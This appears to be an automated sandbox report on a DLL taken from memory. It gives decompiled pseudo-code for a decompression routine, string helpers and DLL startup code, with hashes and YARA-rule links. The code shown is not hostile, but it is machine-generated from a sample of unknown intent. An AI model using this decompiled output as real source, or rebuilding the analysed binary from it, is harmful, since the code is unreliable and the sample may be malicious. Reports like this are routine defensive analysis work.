Instruction ID: 99c4b819349862395c1f58cdc45e3f29dccb25a3ae68f831716778720be93246
Opcode Fuzzy Hash: 45146cce4d8c010f85e302058b7453ac92c777d210fddd7a571546b39c874ffe
Instruction Fuzzy Hash: 16312E71C10108DFCB05DBD4CC54BEEBBBCAF54704F448999D1066B290EB746A4ACBB1

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCE7B0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E6EDCE7B0(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v44;
				char _v68;
				char _v112;
				intOrPtr _t45;
				void* _t46;
				void* _t49;
				void* _t56;
				intOrPtr _t84;
				void* _t87;

				_push(0xffffffff);
				_push(0x6ee563ad);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t84;
				_v32 = 0;
				E6EDB1B00( &_v68);
				_v8 = 0;
				E6EDB1D00( &_v44, _a8);
				_v8 = 1;
				E6EDB1EB0( &_v44,  &_v20);
				E6EDB1ED0( &_v44,  &_v68, __eflags,  &_v68); // executed
				_push(_v20); // executed
				_t45 = E6EE3ACE2(); // executed
				_v28 = _t45;
				_v24 = _v20;
				_t46 = E6EDB29F0( &_v68);
				_t49 = E6EE2ECC0(_v28,  &_v24, E6EDB2660( &_v68), _t46);
				_t87 = _t84 - 0x60 + 0x14;
				_t90 = _t49;
				if(_t49 != 0) {
					_push("uncompress failed");
					E6EDB2B80(_t90);
					_t87 = _t87 + 4;
					E6EE3AAA4(1);
				}
				_t91 = _v20 - _v24;
				if(_v20 != _v24) {
					_push("if (origSize != out_len)");
					E6EDB2B80(_t91);
					_t87 = _t87 + 4;
					E6EE3AAA4(1);
				}
				E6EDB34C0( &_v112, _t91, _v28, _v24); // executed
				_v8 = 2;
				E6EE3ACC7(_v28);
				E6EDCC170(_a4,  &_v112);
				_v32 = _v32 | 0x00000001;
				_v8 = 1;
				_t56 = E6EDCC420( &_v112);
				_v8 = 0;
				E6EDB1DC0(_t56,  &_v44);
				_v8 = 0xffffffff;
				E6EDB1D80( &_v68);
				 *[fs:0x0] = _v16;
				return _a4;
			}

APIs

Part of subcall function 6EDB1ED0: task.LIBCPMTD ref: 6EDB1EF7

~.LIBCPMTD ref: 6EDCE8B0
task.LIBCPMTD ref: 6EDCE8CB

Part of subcall function 6EDB2B80: __vfwprintf_l.LIBCONCRTD ref: 6EDB2BA1

Strings

uncompress failed, xrefs: 6EDCE844
if (origSize != out_len), xrefs: 6EDCE860

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task$__vfwprintf_l
String ID: if (origSize != out_len)$uncompress failed
API String ID: 3740486980-1470903686
Opcode ID: 1fbe621318da5509b42185fc6cfb7d228adea034ab94df1cfac8b7be6e5f3506
Instruction ID: f1cc312c190bdf069a3d964173308e0bb18ca3f198d726a28ba05096f7288bdf
Opcode Fuzzy Hash: 1fbe621318da5509b42185fc6cfb7d228adea034ab94df1cfac8b7be6e5f3506
Instruction Fuzzy Hash: 2D316FB2D00109DBCF04DFD4C851BEEB77CBF54258F144918E516AB280EB346A49CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB2A40, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDB2A40(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed char _v5;
				intOrPtr _v12;
				char _v20;
				signed int _t11;

				_v12 = __ecx;
				E6EDB2A90(_v12, _a4, _a8,  &_v5); // executed
				_t11 = _v5 & 0x000000ff;
				if(_t11 == 0) {
					E6EDB1B70( &_v20, "#44");
					return E6EE37B80( &_v20, 0x6ee67f10);
				}
				return _t11;
			}

0x6edb2a46
0x6edb2a58
0x6edb2a5d
0x6edb2a63
0x6edb2a6d
0x00000000
0x6edb2a7b
0x6edb2a83

APIs

std::locale::facet::facet.LIBCPMTD ref: 6EDB2A6D

Part of subcall function 6EE37B80: RaiseException.KERNEL32(E06D7363,00000001,00000003,6EE370C5,?,?,?,6EE370C5,?,6EE67E9C), ref: 6EE37BE0

Strings

#44, xrefs: 6EDB2A65

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaisestd::locale::facet::facet
String ID: #44
API String ID: 1247307126-1607739113
Opcode ID: 596bc70fd53759f25efababfe2aca6d63ef5c305f054dabb52ddf11dc29f1999
Instruction ID: d248e7dd3470ded81cbd9c3bb9d2227c968d328c09494cc89be56385a8f7e1c2
Opcode Fuzzy Hash: 596bc70fd53759f25efababfe2aca6d63ef5c305f054dabb52ddf11dc29f1999
Instruction Fuzzy Hash: 20E092B291411DBB8B04DBE4CC50EFFB77CAE44204F10899DE416A7280FB31A618C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB3230, Relevance: 3.1, APIs: 2, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDB3230(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, char _a8, signed int _a12) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* _t55;
				char _t62;

				_v12 = __ecx;
				_v8 = _v12;
				_v16 =  *((intOrPtr*)(_v8 + 0x10));
				_t55 = E6EDB2990(_v12, __eflags);
				_t114 = _t55 - _v16 - _a4;
				if(_t55 - _v16 < _a4) {
					E6EDB2490();
				}
				_v24 = _v16 + _a4;
				_v32 =  *((intOrPtr*)(_v8 + 0x14));
				_v28 = E6EDB2130(_v12, _v24);
				_v40 = E6EDB2200(_v12);
				_t62 = E6EDB24A0(_v40, _t114, _v28 + 1); // executed
				_v20 = _t62;
				E6EDB1DC0(_t62, _v8);
				 *((intOrPtr*)(_v8 + 0x10)) = _v24;
				 *((intOrPtr*)(_v8 + 0x14)) = _v28;
				_v44 = E6EDB1440(_v20);
				if(_v32 < 0x10) {
					E6EDB35C0( &_a8, _v44, _v8, _v16, _a12 & 0x000000ff);
					E6EDB1400(_v8, _v8,  &_v20);
				} else {
					_v36 =  *_v8;
					E6EDB35C0( &_a8, _v44, E6EDB1440(_v36), _v16, _a12 & 0x000000ff);
					E6EDB26D0(_v40, _v36, _v32 + 1); // executed
					 *_v8 = _v20;
				}
				return _v12;
			}

0x6edb3236
0x6edb323c
0x6edb3245
0x6edb324b
0x6edb3253
0x6edb3256
0x6edb3258
0x6edb3258
0x6edb3263
0x6edb326c
0x6edb327b
0x6edb3286
0x6edb3293
0x6edb3298
0x6edb329e
0x6edb32a9
0x6edb32b2
0x6edb32c1
0x6edb32c8
0x6edb3325
0x6edb3332
0x6edb32ca
0x6edb32cf
0x6edb32ef
0x6edb3302
0x6edb330d
0x6edb330d
0x6edb3340

APIs

Part of subcall function 6EDB2990: _Max_value.LIBCPMTD ref: 6EDB29BC
Part of subcall function 6EDB2990: _Min_value.LIBCPMTD ref: 6EDB29E2

allocator.LIBCONCRTD ref: 6EDB3293
allocator.LIBCONCRTD ref: 6EDB3302

Part of subcall function 6EDB2490: std::_Xinvalid_argument.LIBCPMT ref: 6EDB2498

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: allocator$Max_valueMin_valueXinvalid_argumentstd::_
String ID:
API String ID: 3868691235-0
Opcode ID: 0096af6fc34ffa91af832f778a2d716f694a4d4877f5d4494ae72fb32922d038
Instruction ID: df31af9331993348991ba20dea9c6aa2aa0e7068567ae3da369b52a5ce16a277
Opcode Fuzzy Hash: 0096af6fc34ffa91af832f778a2d716f694a4d4877f5d4494ae72fb32922d038
Instruction Fuzzy Hash: 574186B5D00109EFCB08DFD9D9909EEB7B9BF48308F248559E516A7350EB30AE41DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB3640, Relevance: 3.1, APIs: 2, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDB3640(intOrPtr __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				char _t51;
				intOrPtr _t57;
				intOrPtr _t59;

				_v16 = __ecx;
				_v20 = _a4;
				_v12 =  *((intOrPtr*)(_v20 + 0x10));
				_v24 = E6EDB2310(_v20);
				_v8 = _v16;
				if(_v12 >= 0x10) {
					_v44 = E6EDB2200(_v16);
					_v36 = E6EDB2990(_v16, __eflags);
					_v40 = _v12 | 0x0000000f;
					_v32 =  *((intOrPtr*)(E6EDB17D0( &_v40,  &_v36)));
					_t51 = E6EDB24A0(_v44, __eflags, _v32 + 1); // executed
					_v28 = _t51;
					E6EDB1400(_v44, _v8,  &_v28);
					__eflags = _v12 + 1;
					E6EDB2680(E6EDB1440(_v28), _v24, _v12 + 1);
					 *((intOrPtr*)(_v8 + 0x10)) = _v12;
					_t57 = _v8;
					 *((intOrPtr*)(_t57 + 0x14)) = _v32;
					return _t57;
				}
				E6EDB2680(_v8, _v24, 0x10);
				_t59 = _v8;
				 *(_t59 + 0x10) = _v12;
				 *((intOrPtr*)(_v8 + 0x14)) = 0xf;
				return _t59;
			}

0x6edb3646
0x6edb364c
0x6edb3655
0x6edb3660
0x6edb3666
0x6edb366d
0x6edb36a1
0x6edb36ac
0x6edb36b5
0x6edb36ca
0x6edb36d7
0x6edb36dc
0x6edb36e7
0x6edb36f2
0x6edb3707
0x6edb3715
0x6edb3718
0x6edb371e
0x00000000
0x6edb371e
0x6edb3679
0x6edb3681
0x6edb3687
0x6edb368d
0x00000000

APIs

_Min_value.LIBCPMTD ref: 6EDB36C0
allocator.LIBCONCRTD ref: 6EDB36D7

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Min_valueallocator
String ID:
API String ID: 2162267568-0
Opcode ID: cb6885b4dbb1ee9551cfb46cf8f0d3cc12a3f9dc934340e6adac065c151ab22a
Instruction ID: d2962a56be60d9cbc8cc127596a55d5799df8809b5958a1ffd28f60dc2184b9f
Opcode Fuzzy Hash: cb6885b4dbb1ee9551cfb46cf8f0d3cc12a3f9dc934340e6adac065c151ab22a
Instruction Fuzzy Hash: 1231D8B5D00209EFCB08CFD4D9909EEBBB9BF48308F104959D516AB341E730AA45DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6EE368AE, Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6EE368AE(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
				void* _t43;
				char _t44;
				signed int _t48;
				signed int _t54;
				signed int _t55;
				signed int _t56;
				signed int _t59;
				signed char _t67;
				signed int _t69;
				void* _t80;
				signed int _t86;
				void* _t90;
				void* _t102;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr* _t121;
				void* _t123;
				void* _t140;

				_t113 = __esi;
				_t106 = __edi;
				_t105 = __edx;
				_push(0x10);
				E6EE374F0(__ebx, __edi, __esi);
				_t43 = E6EE36DB1(__ecx, __edx, 0); // executed
				_t90 = 0x6ee686a8;
				if(_t43 == 0) {
					L11:
					_t44 = 0;
					__eflags = 0;
					goto L12;
				} else {
					 *((char*)(_t123 - 0x1d)) = E6EE36CB6();
					_t85 = 1;
					 *((char*)(_t123 - 0x19)) = 1;
					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
					_t132 =  *0x6ee78ee8;
					if( *0x6ee78ee8 != 0) {
						E6EE37375(_t105, __edi, __esi, 7);
						asm("int3");
						_push(0x10);
						_push(0x6ee686c8);
						E6EE374F0(1, __edi, __esi);
						_t48 =  *0x6ee78ee4; // 0x1
						__eflags = _t48;
						if(_t48 > 0) {
							 *0x6ee78ee4 = _t48 - 1;
							 *(_t123 - 0x1c) = 1;
							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
							 *((char*)(_t123 - 0x20)) = E6EE36CB6();
							 *(_t123 - 4) = 1;
							__eflags =  *0x6ee78ee8 - 2;
							if( *0x6ee78ee8 != 2) {
								E6EE37375(_t105, 1, _t113, 7);
								asm("int3");
								_push(0xc);
								_push(0x6ee686f0);
								E6EE374F0(1, 1, _t113);
								_t110 =  *(_t123 + 0xc);
								__eflags = _t110;
								if(_t110 != 0) {
									L23:
									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
									__eflags = _t110 - 1;
									if(_t110 == 1) {
										L26:
										_t86 =  *(_t123 + 0x10);
										_t115 = E6EE36B70( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
										 *(_t123 - 0x1c) = _t115;
										__eflags = _t115;
										if(_t115 != 0) {
											_t55 = E6EE3685B(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t55;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t115;
											if(__eflags != 0) {
												goto L28;
											}
										}
									} else {
										__eflags = _t110 - 2;
										if(__eflags == 0) {
											goto L26;
										} else {
											_t86 =  *(_t123 + 0x10);
											L28:
											_t56 = E6EDB10E0(__eflags,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
											_t115 = _t56;
											 *(_t123 - 0x1c) = _t115;
											__eflags = _t110 - 1;
											if(_t110 == 1) {
												__eflags = _t115;
												if(__eflags == 0) {
													_t59 = E6EDB10E0(__eflags,  *((intOrPtr*)(_t123 + 8)), _t56, _t86);
													__eflags = _t86;
													_t34 = _t86 != 0;
													__eflags = _t34;
													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
													L14();
													_pop(_t90);
													E6EE36B70( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
												}
											}
											__eflags = _t110;
											if(_t110 == 0) {
												L33:
												_t115 = E6EE3685B(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
												 *(_t123 - 0x1c) = _t115;
												__eflags = _t115;
												if(_t115 != 0) {
													_t115 = E6EE36B70( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
													 *(_t123 - 0x1c) = _t115;
												}
											} else {
												__eflags = _t110 - 3;
												if(_t110 == 3) {
													goto L33;
												}
											}
										}
									}
									 *(_t123 - 4) = 0xfffffffe;
									_t54 = _t115;
								} else {
									__eflags =  *0x6ee78ee4 - _t110; // 0x1
									if(__eflags > 0) {
										goto L23;
									} else {
										_t54 = 0;
									}
								}
								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
								return _t54;
							} else {
								E6EE36D81(1, _t90, 1, _t113);
								E6EE37340();
								E6EE374C4();
								 *0x6ee78ee8 =  *0x6ee78ee8 & 0x00000000;
								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
								E6EE36A4A();
								_t67 = E6EE36F22(_t90,  *((intOrPtr*)(_t123 + 8)), 0);
								asm("sbb esi, esi");
								_t119 =  ~(_t67 & 0x000000ff) & 1;
								__eflags = _t119;
								 *(_t123 - 0x1c) = _t119;
								 *(_t123 - 4) = 0xfffffffe;
								E6EE36A57();
								_t69 = _t119;
								goto L18;
							}
						} else {
							_t69 = 0;
							L18:
							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
							return _t69;
						}
					} else {
						 *0x6ee78ee8 = 1;
						if(E6EE36D13(_t132) != 0) {
							E6EE37334(E6EE37498());
							E6EE37352();
							_t80 = E6EE4339B(0x6ee57180, 0x6ee57198); // executed
							_pop(_t102);
							if(_t80 == 0 && E6EE36CE8(1, _t102, _t140) != 0) {
								E6EE43356(_t102, 0x6ee57150, 0x6ee5717c); // executed
								 *0x6ee78ee8 = 2;
								_t85 = 0;
								 *((char*)(_t123 - 0x19)) = 0;
							}
						}
						 *(_t123 - 4) = 0xfffffffe;
						E6EE36991();
						if(_t85 != 0) {
							goto L11;
						} else {
							_t121 = E6EE3736F();
							_t138 =  *_t121;
							if( *_t121 != 0) {
								_push(_t121);
								if(E6EE36E71(_t85, _t106, _t121, _t138) != 0) {
									 *0x6ee5714c( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
									 *((intOrPtr*)( *_t121))();
								}
							}
							 *0x6ee78ee4 =  *0x6ee78ee4 + 1;
							_t44 = 1;
						}
						L12:
						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
						return _t44;
					}
				}
			}

0x6ee368ae
0x6ee368ae
0x6ee368ae
0x6ee368ae
0x6ee368b5
0x6ee368bc
0x6ee368c1
0x6ee368c4
0x6ee3699b
0x6ee3699b
0x6ee3699b
0x00000000
0x6ee368ca
0x6ee368cf
0x6ee368d2
0x6ee368d4
0x6ee368d7
0x6ee368db
0x6ee368e2
0x6ee369af
0x6ee369b4
0x6ee369b5
0x6ee369b7
0x6ee369bc
0x6ee369c1
0x6ee369c6
0x6ee369c8
0x6ee369cf
0x6ee369d7
0x6ee369da
0x6ee369e3
0x6ee369e6
0x6ee369e9
0x6ee369f0
0x6ee36a5f
0x6ee36a64
0x6ee36a65
0x6ee36a67
0x6ee36a6c
0x6ee36a71
0x6ee36a74
0x6ee36a76
0x6ee36a87
0x6ee36a87
0x6ee36a8b
0x6ee36a8e
0x6ee36a9a
0x6ee36a9a
0x6ee36aa7
0x6ee36aa9
0x6ee36aac
0x6ee36aae
0x6ee36ab9
0x6ee36abe
0x6ee36ac0
0x6ee36ac3
0x6ee36ac5
0x00000000
0x00000000
0x6ee36ac5
0x6ee36a90
0x6ee36a90
0x6ee36a93
0x00000000
0x6ee36a95
0x6ee36a95
0x6ee36acb
0x6ee36ad0
0x6ee36ad5
0x6ee36ad7
0x6ee36ada
0x6ee36add
0x6ee36adf
0x6ee36ae1
0x6ee36ae8
0x6ee36aed
0x6ee36aef
0x6ee36aef
0x6ee36af5
0x6ee36af6
0x6ee36afb
0x6ee36b01
0x6ee36b01
0x6ee36ae1
0x6ee36b06
0x6ee36b08
0x6ee36b0f
0x6ee36b19
0x6ee36b1b
0x6ee36b1e
0x6ee36b20
0x6ee36b2c
0x6ee36b54
0x6ee36b54
0x6ee36b0a
0x6ee36b0a
0x6ee36b0d
0x00000000
0x00000000
0x6ee36b0d
0x6ee36b08
0x6ee36a93
0x6ee36b57
0x6ee36b5e
0x6ee36a78
0x6ee36a78
0x6ee36a7e
0x00000000
0x6ee36a80
0x6ee36a80
0x6ee36a80
0x6ee36a7e
0x6ee36b63
0x6ee36b6f
0x6ee369f2
0x6ee369f2
0x6ee369f7
0x6ee369fc
0x6ee36a01
0x6ee36a08
0x6ee36a0c
0x6ee36a16
0x6ee36a22
0x6ee36a24
0x6ee36a24
0x6ee36a26
0x6ee36a29
0x6ee36a30
0x6ee36a35
0x00000000
0x6ee36a35
0x6ee369ca
0x6ee369ca
0x6ee36a37
0x6ee36a3a
0x6ee36a46
0x6ee36a46
0x6ee368e8
0x6ee368e8
0x6ee368f9
0x6ee36900
0x6ee36905
0x6ee36914
0x6ee3691a
0x6ee3691d
0x6ee36932
0x6ee36939
0x6ee36943
0x6ee36945
0x6ee36945
0x6ee3691d
0x6ee36948
0x6ee3694f
0x6ee36956
0x00000000
0x6ee36958
0x6ee3695d
0x6ee3695f
0x6ee36962
0x6ee36964
0x6ee3696d
0x6ee3697b
0x6ee36981
0x6ee36981
0x6ee3696d
0x6ee36983
0x6ee3698b
0x6ee3698b
0x6ee3699d
0x6ee369a0
0x6ee369ac
0x6ee369ac
0x6ee368e2

APIs

__RTC_Initialize.LIBCMT ref: 6EE368FB

Part of subcall function 6EE37334: InitializeSListHead.KERNEL32(6EE78F18,6EE36905,6EE686A8,00000010,6EE36896,?,?,?,6EE36ABE,?,00000001,?,?,00000001,?,6EE686F0), ref: 6EE37339

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6EE36965

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 3231365870-0
Opcode ID: eb654a768df4d4ae07a7d2e24c8e447c72085b5e35e0950246cc161955e40913
Instruction ID: 9ea01bb02b11b79b66f2a197cc6648dfc0e4a59b968fdb4bfd6e62ae27718219
Opcode Fuzzy Hash: eb654a768df4d4ae07a7d2e24c8e447c72085b5e35e0950246cc161955e40913
Instruction Fuzzy Hash: 3C21FA322782739AEF00EBF8A9003DD7BA69F1622DF30485DD8802B3C0CB725064C666

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB14F0, Relevance: 3.1, APIs: 2, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EDB14F0(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t35;
				char _t41;

				_v8 = __ecx;
				_t35 = E6EDB2990(_v8, __eflags);
				_t78 = _a4 - _t35;
				if(_a4 > _t35) {
					E6EDB2490();
				}
				_v20 =  *((intOrPtr*)(_v8 + 0x14));
				_v16 = E6EDB2130(_v8, _a4);
				_v24 = E6EDB2200(_v8);
				_t41 = E6EDB24A0(_v24, _t78, _v16 + 1); // executed
				_v12 = _t41;
				E6EDB1DC0(_t41, _v8);
				 *((intOrPtr*)(_v8 + 0x10)) = _a4;
				 *((intOrPtr*)(_v8 + 0x14)) = _v16;
				E6EDB1F10( &_a8, E6EDB1440(_v12), _a4, _a12);
				if(_v20 < 0x10) {
					E6EDB1400( &_v12, _v8,  &_v12);
				} else {
					E6EDB26D0(_v24,  *_v8, _v20 + 1);
					 *_v8 = _v12;
				}
				return _v8;
			}

0x6edb14f6
0x6edb14fc
0x6edb1501
0x6edb1504
0x6edb1506
0x6edb1506
0x6edb1511
0x6edb1520
0x6edb152b
0x6edb1538
0x6edb153d
0x6edb1543
0x6edb154e
0x6edb1557
0x6edb1572
0x6edb157b
0x6edb15a4
0x6edb157d
0x6edb158d
0x6edb1598
0x6edb1598
0x6edb15b2

APIs

Part of subcall function 6EDB2990: _Max_value.LIBCPMTD ref: 6EDB29BC
Part of subcall function 6EDB2990: _Min_value.LIBCPMTD ref: 6EDB29E2

allocator.LIBCONCRTD ref: 6EDB1538
allocator.LIBCONCRTD ref: 6EDB158D

Part of subcall function 6EDB2490: std::_Xinvalid_argument.LIBCPMT ref: 6EDB2498

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: allocator$Max_valueMin_valueXinvalid_argumentstd::_
String ID:
API String ID: 3868691235-0
Opcode ID: 09eec5c0a034c05a7c1559dab13cf6c71817223b74b27936ba74818878c49b92
Instruction ID: 9a65e7c1d0bbedb25857ea26949fde1e99a3911a3960f35e68fbda69f7bf9283
Opcode Fuzzy Hash: 09eec5c0a034c05a7c1559dab13cf6c71817223b74b27936ba74818878c49b92
Instruction Fuzzy Hash: C221CDB5D00109EFCB04DFD8D9919DEB7B9BF48344B104599E416A7350EB30AF44DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB2870, Relevance: 3.1, APIs: 2, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E6EDB2870(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v56;
				char _v80;
				intOrPtr _t51;
				intOrPtr _t53;

				_t56 = __eflags;
				_t51 = __edx;
				_push(0xffffffff);
				_push(0x6ee560a5);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_v20 = __ecx;
				_v24 = 0;
				E6EDB18A0( &_v80, __eflags, "z");
				_v8 = 0;
				_v32 = E6EDB27E0(_v20);
				_v28 = _t51;
				E6EDB1B00( &_v56);
				_v8 = 1;
				_push(E6EDB2660( &_v80));
				E6EDB1340(_t29);
				E6EDB2A40(_v20, _t56,  &_v56, _v32, _v28); // executed
				E6EDB1840(_a4,  &_v56);
				_v24 = _v24 | 0x00000001;
				_v8 = 0;
				E6EDB1D80( &_v56);
				_v8 = 0xffffffff;
				E6EDB1D80( &_v80);
				 *[fs:0x0] = _v16;
				return _a4;
			}

0x6edb2870
0x6edb2870
0x6edb2873
0x6edb2875
0x6edb2880
0x6edb2881
0x6edb288b
0x6edb288e
0x6edb289d
0x6edb28a2
0x6edb28b1
0x6edb28b4
0x6edb28ba
0x6edb28bf
0x6edb28cb
0x6edb28cc
0x6edb28e3
0x6edb28ef
0x6edb28fa
0x6edb28fd
0x6edb2904
0x6edb2909
0x6edb2913
0x6edb291e
0x6edb2928

APIs

Part of subcall function 6EDB2A40: std::locale::facet::facet.LIBCPMTD ref: 6EDB2A6D

task.LIBCPMTD ref: 6EDB2904
task.LIBCPMTD ref: 6EDB2913

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task$std::locale::facet::facet
String ID:
API String ID: 3668245285-0
Opcode ID: a26fc793bfd08d5b8d540fe38c3bb545ada3ae44d20419e8d86ac9b5691d0d5b
Instruction ID: 221b213318d465469cb877da11d50598a2346c01d4bd8ce990caf541a0dfd30a
Opcode Fuzzy Hash: a26fc793bfd08d5b8d540fe38c3bb545ada3ae44d20419e8d86ac9b5691d0d5b
Instruction Fuzzy Hash: F6112BB1D01149EBCB04DFD4D950BEEBBB9FF44354F204969E42667390EB346A08CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB23A0, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6EDB23A0(intOrPtr* __ecx) {
				intOrPtr _v16;
				char _v17;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t26;
				intOrPtr _t48;
				void* _t49;

				_push(0xffffffff);
				_push(0x6ee56030);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t49 = _t48 - 0x10;
				_v24 = __ecx;
				E6EDB1DC0( *[fs:0x0], _v24);
				if((E6EDB2220(_v24) & 0x000000ff) != 0) {
					_v28 =  *_v24;
					_v32 = E6EDB2200(_v24);
					_push(_v24);
